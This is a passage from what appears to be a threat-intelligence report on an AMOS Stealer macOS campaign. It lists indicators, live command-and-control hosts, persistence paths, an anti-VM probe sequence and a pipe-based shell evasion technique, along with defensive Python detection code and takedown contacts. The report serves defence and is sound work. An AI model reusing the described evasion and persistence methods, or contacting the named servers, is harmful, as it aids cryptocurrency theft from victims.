# Magic header at __const+0 (shared across all AMOS variants)
5F 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
# SplitMix64 constant (kakkaa), little-endian
CB 20 F6 CC B0 2D 54 59
# Entry XOR seed (kakkaa), little-endian
73 CD 17 BC 23 BC 48 67
# Golden ratio constant, little-endian
B1 79 37 9E
# Build IDs
xFsGFKxHG2Bb6HUsGs4wSMqw/K7GC1rlhPrmG0FaOvE=
yv0MUSz6SfuafDSpJehiSeIKtKFx2Y1q1wCEVkdV1lQ=
# Trojanized wallet Bundle IDs
com.led.mas
com.app.moso
test.exodus-web-app
```
Defensive Recommendations
Immediate Actions
- Block all network IOCs at the perimeter: the IPs, domains, and URLs listed above. Consider blocking the entire `38.244.158.0/24` and `45.94.47.0/24` subnets.
- Hunt for persistence artifacts: the `com.finder.helper` LaunchDaemon, `/.agent`, `/.mainhelper`, `/.id`, and `/tmp/.botlock`.
- Verify wallet application integrity: check the bundle IDs of installed Ledger, Trezor, and Exodus apps. Legitimate bundle IDs will not be `com.led.mas`, `com.app.moso`, or `test.exodus-web-app`.
- Alert on `osascript` whose child shell runs `system_profiler SPMemoryDataType` or `SPHardwareDataType` within a short timeframe; this is the anti-VM check sequence (the decrypted script invokes them via `do shell script`).
- Monitor for HTTP POST to bare IP addresses on port 80 with the `/contact` path and custom headers (`BuildID`, `cl`, `cn`).
Detection Engineering
- YARA rule: detect the `0x5F` header marker plus the SplitMix64 constant (`0x59542DB0CCF620CB`) in Mach-O `__TEXT.__const` sections.
- EDR query for pipe-based execution: the `pipe()` + `fork()` + `dup2()` + `execl("/bin/sh", "sh", "-s")` sequence, the new evasion pattern in kakkaa.
- Sigma rule: HTTP POST to `/contact` with a `BuildID` header and multipart form data containing a ZIP attachment.
- Suricata/Snort: alert on HTTP POST to `/api/join/` or `/api/tasks/` on port 80 to any IP in the `45.94.47.0/24` range.
- File integrity monitoring: any writes to the filesystem root (`/.agent`, `/.mainhelper`, `/.id`) or to `/Library/LaunchDaemons/com.finder.helper.plist`.
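The endpoint-side rules above (the pipe-fed shell from the kakkaa execution flow, the osascript/system_profiler anti-VM sequence, and the root-level persistence artifacts from the Host Indicators table) can be prototyped against process and file telemetry before being ported to a specific EDR query language. The following is an added example written for this write-up, not code from the report or from any EDR product. The event schema (`ProcEvent` with a `stdin_kind` field describing what fd 0 is, `FileEvent` for writes), the trusted-parent allowlist, and the sample events are all constructed assumptions; the telemetry is modelled on the kakkaa -> `sh -s` -> `osascript` -> `system_profiler` chain the report describes, with one benign pipe-fed shell and one benign dotfile write included to show the rules not firing.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

SHELLS = {"/bin/sh", "/bin/bash", "/bin/zsh"}
VM_PROBES = {"SPMemoryDataType", "SPHardwareDataType"}
# Parents that legitimately feed scripts to a shell over a pipe (assumed allowlist; tune per fleet).
TRUSTED_PARENT_PREFIXES = ("/usr/", "/bin/", "/sbin/", "/System/", "/Library/Apple/")
ROOT_DOTFILE = re.compile(r"^/\.[^/]+$")          # /.agent, /.mainhelper, /.id, /.pass, ...
KNOWN_ARTIFACTS = {"/tmp/.botlock", "/Library/LaunchDaemons/com.finder.helper.plist"}


@dataclass
class ProcEvent:
    ts: float
    pid: int
    ppid: int
    exe: str
    argv: List[str]
    parent_exe: str
    stdin_kind: str   # "pipe", "tty", "file" or "none" (assumed field: the type of fd 0 at exec)


@dataclass
class FileEvent:
    ts: float
    pid: int
    path: str


def detect_pipe_fed_shell(p: ProcEvent) -> Optional[str]:
    """kakkaa pattern: a shell with no script on argv reading from a pipe, spawned by
    something that is not an OS binary. argv looks innocent, so key on fd 0 and parent."""
    if p.exe not in SHELLS or p.stdin_kind != "pipe":
        return None
    if any(not a.startswith("-") for a in p.argv[1:]):   # a script path or -c payload is on argv
        return None
    if p.parent_exe.startswith(TRUSTED_PARENT_PREFIXES):
        return None
    return f"pipe-fed {p.exe} (pid {p.pid}) spawned by {p.parent_exe}"


def _ancestors(pid: int, by_pid: Dict[int, ProcEvent], depth: int = 4) -> set:
    seen = set()
    while pid in by_pid and depth > 0:
        pid = by_pid[pid].ppid
        seen.add(pid)
        depth -= 1
    return seen


def detect_anti_vm_sequence(events: List[ProcEvent], window: float = 5.0) -> List[str]:
    """osascript and system_profiler SPMemoryDataType/SPHardwareDataType in the same
    process tree within a few seconds. The decrypted check runs them via do shell script,
    so system_profiler is normally a grandchild of osascript (osascript -> sh -c -> probe)."""
    by_pid = {e.pid: e for e in events}
    probes = [e for e in events if e.exe.endswith("/system_profiler") and VM_PROBES & set(e.argv)]
    scripts = [e for e in events if e.exe.endswith("/osascript")]
    hits = []
    for probe in probes:
        for osa in scripts:
            related = osa.pid in _ancestors(probe.pid, by_pid) or probe.pid in _ancestors(osa.pid, by_pid)
            if related and abs(probe.ts - osa.ts) <= window:
                hits.append(f"anti-VM probe '{' '.join(probe.argv)}' (pid {probe.pid}) under osascript pid {osa.pid}")
    return hits


def detect_persistence_writes(files: List[FileEvent]) -> List[str]:
    """Root-level dotfiles and the com.finder.helper LaunchDaemon plist from the report."""
    return [f"persistence artifact written: {f.path} (pid {f.pid})"
            for f in files if ROOT_DOTFILE.match(f.path) or f.path in KNOWN_ARTIFACTS]


def run_detections(procs: List[ProcEvent], files: List[FileEvent]) -> List[str]:
    alerts = [a for p in procs if (a := detect_pipe_fed_shell(p))]
    return alerts + detect_anti_vm_sequence(procs) + detect_persistence_writes(files)


# Constructed telemetry modelled on the kakkaa -> sh -s -> osascript -> system_profiler chain.
SAMPLE_PROCS = [
    ProcEvent(100.0, 501, 500, "/Users/u/Downloads/kakkaa_puolaan", ["kakkaa_puolaan"], "/sbin/launchd", "none"),
    ProcEvent(100.2, 502, 501, "/bin/sh", ["sh", "-s"], "/Users/u/Downloads/kakkaa_puolaan", "pipe"),
    ProcEvent(100.5, 503, 502, "/usr/bin/osascript", ["osascript", "-e", "..."], "/bin/sh", "none"),
    ProcEvent(100.7, 504, 503, "/bin/sh", ["sh", "-c", "system_profiler SPMemoryDataType"], "/usr/bin/osascript", "none"),
    ProcEvent(100.8, 505, 504, "/usr/sbin/system_profiler", ["system_profiler", "SPMemoryDataType"], "/bin/sh", "none"),
    ProcEvent(200.0, 600, 1, "/bin/sh", ["sh", "-s"], "/usr/bin/xcodebuild", "pipe"),   # benign: trusted parent
]
SAMPLE_FILES = [
    FileEvent(101.0, 502, "/.agent"),
    FileEvent(101.1, 502, "/Library/LaunchDaemons/com.finder.helper.plist"),
    FileEvent(101.2, 502, "/Users/u/.zshrc"),   # benign: a dotfile, but not at the filesystem root
]

if __name__ == "__main__":
    for alert in run_detections(SAMPLE_PROCS, SAMPLE_FILES):
        print(alert)
```

The pipe rule is the one that matters for the kakkaa change: a command-line-only query sees `sh -s` and nothing else, so the signal has to come from the type of fd 0 and from who the parent is. The trusted-parent allowlist is where the false positives live (build tools and installers legitimately pipe scripts into shells), so expect to tune it per fleet rather than ship it as written.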
Takedown Priorities
- PRIORITY: report `systellis.com` to Cloudflare Trust & Safety; this server is actively receiving stolen BIP39 seed phrases, meaning cryptocurrency theft is ongoing.
- Report `wusetail.com` and `avipstudios.com` to the registrar Hello Internet Corp (abuse@hello.co).
- Report the stealer C2 `38.244.158.103` to abuse@3nt.com and the upstream carrier Cogent (abuse@cogentco.com). Note: 3NT Solutions is unlikely to act; it is a documented bulletproof host.
- Report the backdoor C2 `45.94.47.204` to ip@rapidseedbox.com.
- Request Let's Encrypt certificate revocation for `systellis.com`, `wusetail.com`, and `avipstudios.com`.
Conclusion
This investigation demonstrates that AMOS Stealer is evolving rapidly. In two days (March 2 to March 4, 2026), the operator upgraded from single-arch binaries with rolling XOR encryption to Universal FAT binaries with SplitMix64 PRNG keystreams, triple S-box substitution, anti-VM gating, and a pipe-based execution method that evades command-line monitoring. More significantly, the campaign now includes a cryptocurrency supply chain attack -- replacing legitimate wallet applications with trojanized clones that phish seed phrases -- and a persistent backdoor that maintains long-term remote code execution independent of the stealer C2.
The three-tier C2 architecture (bulletproof hosting for stealer exfil, offshore VPS for backdoor C2, Cloudflare-fronted domains for seed phrase collection) shows operational maturity. The expired domain hijacking technique, registrar rotation, and /zxc/ path convention are consistent with documented COOKIE SPIDER TTPs. The operator is running a professional MaaS operation, and the infrastructure analyzed here is likely serving multiple AMOS customers simultaneously.
All four payload servers (wusetail.com/zxc/*) were live and serving malware at the time of analysis. The kito backdoor binary was updated the same day we downloaded it. The systellis.com seed phrase collection endpoints were active. This is an ongoing operation.
Defenders should prioritize blocking the IOCs listed above, hunting for the persistence artifacts on macOS endpoints, and validating the integrity of any installed cryptocurrency wallet applications. The pipe-based execution evasion in kakkaa warrants updating EDR detection rules that rely solely on process command-line inspection.
Published 2026-03-08 | FGBOT Autonomous Threat Hunting | Breakglass Intelligence Investigation ID: kakkaa-investigation | Samples sourced from MalwareBazaar (reporter: smica83) IOCs are provided for defensive use. Handle responsibly.